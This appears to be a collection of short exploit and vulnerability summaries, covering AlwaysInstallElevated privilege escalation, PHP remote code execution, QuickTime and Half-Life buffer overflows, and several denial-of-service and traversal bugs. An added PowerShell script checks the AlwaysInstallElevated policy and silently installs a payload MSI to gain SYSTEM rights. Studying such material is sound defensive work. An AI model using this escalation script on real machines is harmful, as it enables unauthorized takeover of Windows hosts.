This module checks the AlwaysInstallElevated registry keys, which dictate whether .MSI files are installed with elevated privileges (NT AUTHORITY\SYSTEM). The default MSI file is data/exploits/exec_payload.msi, with the WiX source file under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply executes payload.exe from the same folder. The MSI may not execute successfully on successive runs, but this can usually be worked around by regenerating the MSI. The MSI can be rebuilt from the source using the WiX toolset with the following two commands: candle exec_payload.wxs, then light exec_payload.wixobj.
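As an added example (not code from the module or the page above), the following PowerShell performs the check the module description refers to: it reads the AlwaysInstallElevated value from both the HKLM and HKCU policy keys, reports whether the policy is actually effective (Windows Installer honours it only when both values are 1), and only then hands an MSI to msiexec. The function names and the MSI path are assumptions for illustration.

```powershell
# Added example: enumerate the AlwaysInstallElevated policy and, only if it is
# fully enabled, install an MSI so its custom action runs as NT AUTHORITY\SYSTEM.
# Function names and the MSI path are illustrative assumptions, not module code.

function Get-AlwaysInstallElevatedState {
    # The policy is a DWORD under the Installer policy key in both hives.
    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $result = [ordered]@{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $path  = "${hive}:\$subKey"
        $value = Get-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
        # A missing key or value means the policy is not set in that hive.
        $result[$hive] = if ($null -ne $value) { [int]$value.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        HKLM    = $result['HKLM']
        HKCU    = $result['HKCU']
        # The installer only honours the policy when BOTH values are 1.
        Enabled = ($result['HKLM'] -eq 1 -and $result['HKCU'] -eq 1)
    }
}

function Invoke-MsiIfAlwaysInstallElevated {
    param(
        # Assumed location of the MSI; adjust to wherever the file was dropped.
        [Parameter(Mandatory)][string]$MsiPath
    )
    $state = Get-AlwaysInstallElevatedState
    if (-not $state.Enabled) {
        Write-Warning ("AlwaysInstallElevated not fully enabled (HKLM={0}, HKCU={1}); aborting." -f $state.HKLM, $state.HKCU)
        return $false
    }
    if (-not (Test-Path -LiteralPath $MsiPath)) {
        Write-Warning "MSI not found: $MsiPath"
        return $false
    }
    # /quiet /qn suppresses the installer UI; the install itself is carried out
    # by the Windows Installer service, which is where the SYSTEM context comes from.
    $proc = Start-Process -FilePath 'msiexec.exe' `
        -ArgumentList @('/quiet', '/qn', '/i', "`"$MsiPath`"") -Wait -PassThru
    # A nonzero exit code (for example 1603, the generic install failure) does
    # not by itself mean the payload never ran; see the note above about the
    # MSI not succeeding on successive runs and needing to be regenerated.
    Write-Host ("msiexec exit code: {0}" -f $proc.ExitCode)
    return ($proc.ExitCode -eq 0)
}

# Usage:
#   Get-AlwaysInstallElevatedState
#   Invoke-MsiIfAlwaysInstallElevated -MsiPath 'C:\Users\Public\exec_payload.msi'
```

Run Get-AlwaysInstallElevatedState first on its own during enumeration; seeing HKLM=1 alone is not enough, because the policy is ignored unless the HKCU value is also 1. The install step is kept behind that check deliberately, so the script never runs an MSI on a host where the policy would not elevate it.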
Helper applications shipped with IPNetSentryX and IPNetMonitorX can be abused by a local attacker to perform unauthorized network reconnaissance. The attacker can run the RunTCPDump utility with specific parameters to capture network traffic and gather sensitive information.
The pHNews script is vulnerable to remote code execution because the 'templates_dir' parameter is not sufficiently validated. An attacker can exploit this by manipulating 'templates_dir' to execute arbitrary code on the target server. The exploit works only when register_globals is set to On and magic quotes are turned off. The attacker supplies the command to be executed on the target system.
This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack-based overflow occurs when processing a malformed Content-Type header. The module has been tested successfully against Safari 5.1.7 and 5.0.7 on Windows XP SP3.
By modifying the system configuration values that control the TCP window size, an attacker who can connect to an appliance running a vulnerable version of ScreenOS may trigger a denial of service on it.
The Half-Life client is prone to a remotely exploitable buffer overflow vulnerability. The issue lies in the client connection routine used to negotiate a connection to a Half-Life game server. Due to insufficient bounds checking, a malicious server may execute arbitrary code on an affected client.
Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload.
Input passed to the 'sr' parameter in 'functional_tests.php' is not properly sanitised before being used to retrieve the contents of a resource. This can be exploited via directory traversal to read arbitrary data from local resources.
BRU may not properly parse command-line arguments, potentially leading to at least two vectors of exploitation: local attackers may be able to conduct format string attacks as well as buffer overflow attacks.
This exploit allows remote attackers to execute arbitrary commands on a target system running PmWiki version 2.1.19 or earlier. It takes advantage of a vulnerability in PHP's Zend_Hash_Del_Key_Or_Index function. The attacker can include malicious code from a remote HTTP site and execute shell commands on the target system.